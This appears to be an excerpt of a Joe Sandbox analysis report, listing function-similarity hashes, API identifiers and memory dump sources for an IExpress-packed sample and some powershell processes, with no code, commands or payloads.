Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$@$FINISHMSG
• API String ID: 3507850446-4126004490
• Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
• Instruction ID: 24b8ae0f766d90a177c9f4b9781ae529d9d061bdee502a2b33c250cdb4652e9e
• Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
• Instruction Fuzzy Hash: 42115EB2A08792C7F7609B24E4517BA76B0FF8D795F64A138DA4E82A85DF3DD004CB04
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-476397916
• Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
• Instruction ID: d63289d0d112d2cadd646702d9cc68ba9caedd2344f867aa1e00d988144f2d48
• Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
• Instruction Fuzzy Hash: 04114F71A18686C7EF619B24E4402F977B1FFAD704FA4223AC94D82691DF3CD509C700
APIs
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
• Instruction ID: 9006faccb775e197f5bcf39979c40671d306942d05ce0aed189bd149e1b6d494
• Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
• Instruction Fuzzy Hash: 78115E62A08A85C7E7605B61F4443B9A6B0FF8DB55F646335CA5E863C5CF3CD045CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: gam
• API String ID: 2519184315-4248585140
• Opcode ID: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
• Instruction ID: ea8ea6ae13e63e11d0569f45c1048d32d1a55dd8f7a647b3a08aa5b0cc5c1373
• Opcode Fuzzy Hash: cd403af55b8476f266db926376131480319a2a35561f0b0250f12cd9deded584
• Instruction Fuzzy Hash: 03916862A18652C7FB609B25E44467A66B0BF4C754F34313DDA5ED36D0CE7DE886CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-4151094324
• Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
• Instruction ID: 2455e75c4ba31f8211ca71181e3632b8989413f0faa79e92b040bdbbaff70321
• Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
• Instruction Fuzzy Hash: F6315B72618681C7EB618F14E4847BAB7A0FB9DB94F645239DA5D87794CFBCD408CB00
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID:
• String ID: *MEMCAB
• API String ID: 0-3211172518
• Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
• Instruction ID: 3c5ec9f0890d4f1fbb878fb1ecaff6a35bd97ddbcf24493fb27b3ea6f57af420
• Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
• Instruction Fuzzy Hash: 0831E832A19B42C6EB508B11E4453BA73B0BF5D750FA1623ADA6EC27A0EF7CE444C744
APIs
Strings
• System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF681C2232B
Memory Dump Source
• Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
• Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
Similarity
• API ID: CloseInfoOpenQuery
• String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
• API String ID: 2142960691-1430103811
• Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
• Instruction ID: 49d71fea027a25350e76d82467a9f1a8c387be56485158c6592c666c2d8feed9
• Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
• Instruction Fuzzy Hash: 6B11A772618B81C7E7508F65F44456AFBA4FB89750B645229EB8982B28DF3CD055CF04
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                          • Instruction ID: 5d7f66fdd0563cb2716e9baef3fbc3f1e99924ad8a5e0446ad038a855c017396
                                                                                          • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                                                                                          • Instruction Fuzzy Hash: 0641B275A08B02C2EB508B19F890365B3B4FF89B84FA0653ADA8D82764DF7CE558C744
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                          • String ID:
                                                                                          • API String ID: 642454821-0
                                                                                          • Opcode ID: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                          • Instruction ID: 4246691c399a7acf4cbfa63f4d68cd87b65019fb2a4a8080c7c0d81a4542c0e9
                                                                                          • Opcode Fuzzy Hash: 09076979b3e96fc5e14e933eaad3d45af6720b0af7fabc4f9cac535cb861094d
                                                                                          • Instruction Fuzzy Hash: E5312732A08646C7FB609B22E89037A23F0FF4D394F68653DDA4DC36A5DE2DE854D644
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                          • Instruction ID: b0a76340dd4440f7693c823e2d595351f39a7847da3e4412a685fc087828bd36
                                                                                          • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                                                                                          • Instruction Fuzzy Hash: 2531E379A08B41C2EB508B18F880365B3B4FF89784F60613ADA8D82764DF3CE558C744
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                          • String ID:
                                                                                          • API String ID: 1214682469-0
                                                                                          • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                          • Instruction ID: ea46043a9b2a7480d83365686f6181eb4765688288b21faddb7c13fb1e3250e0
                                                                                          • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                                                                                          • Instruction Fuzzy Hash: D311F972A08B41C7EB508B11E44427AAAA1FF9DFA1F686638DE5D47B94DF3CD440CA04
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Prev$Next
                                                                                          • String ID:
                                                                                          • API String ID: 3260447230-0
                                                                                          • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                          • Instruction ID: 112843f22ab906b029561664ae97c7b4a4e68734614ebf44c954fa0c127f3b47
                                                                                          • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                          • Instruction Fuzzy Hash: C7119162A087D1C7EB510B25E54027DAAA2BF5EFE0F58A234DA2E83785CF2C9840C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                          • Instruction ID: f19b5082ddd6803cf29f2de8006384fd16d89bf71f46ed16e8fb22b4b2238651
                                                                                          • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                          • Instruction Fuzzy Hash: 1D21BF35A18B46C6EB408B55E8803A973B4FF89B44FA0253ADA8D83764DF7DE158CB44
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                          • String ID:
                                                                                          • API String ID: 2776232527-0
                                                                                          • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                          • Instruction ID: 942015dc3dfe287d27bceee74fcd7a341a0d659b1f8741eb10b1c76dbc70745d
                                                                                          • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                          • Instruction Fuzzy Hash: D5113772A18652C7F7A08F21E454B76AAB0FF9D745F54B239DA4A83994DF3CD148CB00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1569204487.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffb4adc0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                          • Instruction ID: 8c9257fe5d68731663ae1ec61466327c0d2dac65b01a250ec753e5be44626dd5
                                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                          • Instruction Fuzzy Hash: 3D01A77010CB0C8FDB44EF0CE051AA6B3E0FB85320F10056DE58AC3691D632E882CB41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4650fe942c8e4bf27d89baacc29f6bfb6343f7df74eb1b84c4c8b6b7f48de56a
                                                                                          • Instruction ID: 91349a84c8d2154f3a2f307d92abd5666a14cf2edabfe9231686a8f4be04721c
                                                                                          • Opcode Fuzzy Hash: 4650fe942c8e4bf27d89baacc29f6bfb6343f7df74eb1b84c4c8b6b7f48de56a
                                                                                          • Instruction Fuzzy Hash: 92D144A290EB8A4FE7A5FE78C8152B87BE5FF46210B2801FED55DC71D3DE19A8058341
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66a7b629970fae8ea6dc5c9f6dcc32ff6d3662644423371c909bdef8dc8bc77f
                                                                                          • Instruction ID: 5484d79977fb5f6ac31892cb896af29e00ebd2d8888b5630724336b1f01fd621
                                                                                          • Opcode Fuzzy Hash: 66a7b629970fae8ea6dc5c9f6dcc32ff6d3662644423371c909bdef8dc8bc77f
                                                                                          • Instruction Fuzzy Hash: 297116A294EBC94FE356BE7888641B57FE5EF97224B2801FFD099C7193D9094C0AC352
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547899505.00007FFB4AEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4aec0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 81ac3885f26f869a9461c2105a15699c5a90c034ce28d575c4f091dee06e3028
                                                                                          • Instruction ID: f820895cc0a3527601475b44ea4a145fcb3da93b5b03a45051494a3e5c6156b0
                                                                                          • Opcode Fuzzy Hash: 81ac3885f26f869a9461c2105a15699c5a90c034ce28d575c4f091dee06e3028
                                                                                          • Instruction Fuzzy Hash: 9D41F0D2D4FBC60FE3A6BE7C89612B86AD5BF42215B7900FAD65CC71D3DD0AA8058301
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1547256827.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ffb4adf0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                          • Instruction ID: 621a85d64378771c845adf7008f338b636f923c62d0a4dd0dc2f465e019c6755
                                                                                          • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                          • Instruction Fuzzy Hash: 5101A77111CB0C8FD744EF0CE051AB6B3E0FB85324F10056DE58AC3661D632E882CB41